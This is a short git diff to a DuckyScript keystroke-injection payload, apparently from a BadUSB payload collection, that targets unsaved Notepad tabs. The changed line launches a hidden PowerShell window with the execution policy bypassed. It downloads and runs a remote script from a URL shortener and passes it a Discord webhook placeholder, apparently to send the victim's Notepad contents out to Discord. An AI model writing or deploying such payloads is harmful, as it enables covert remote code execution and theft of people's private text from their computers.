diff --git a/Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt b/Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt index abc5422..639f7b7 100644 --- a/Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt +++ b/Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_bh_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_nptabs_to_dc | iex ENTER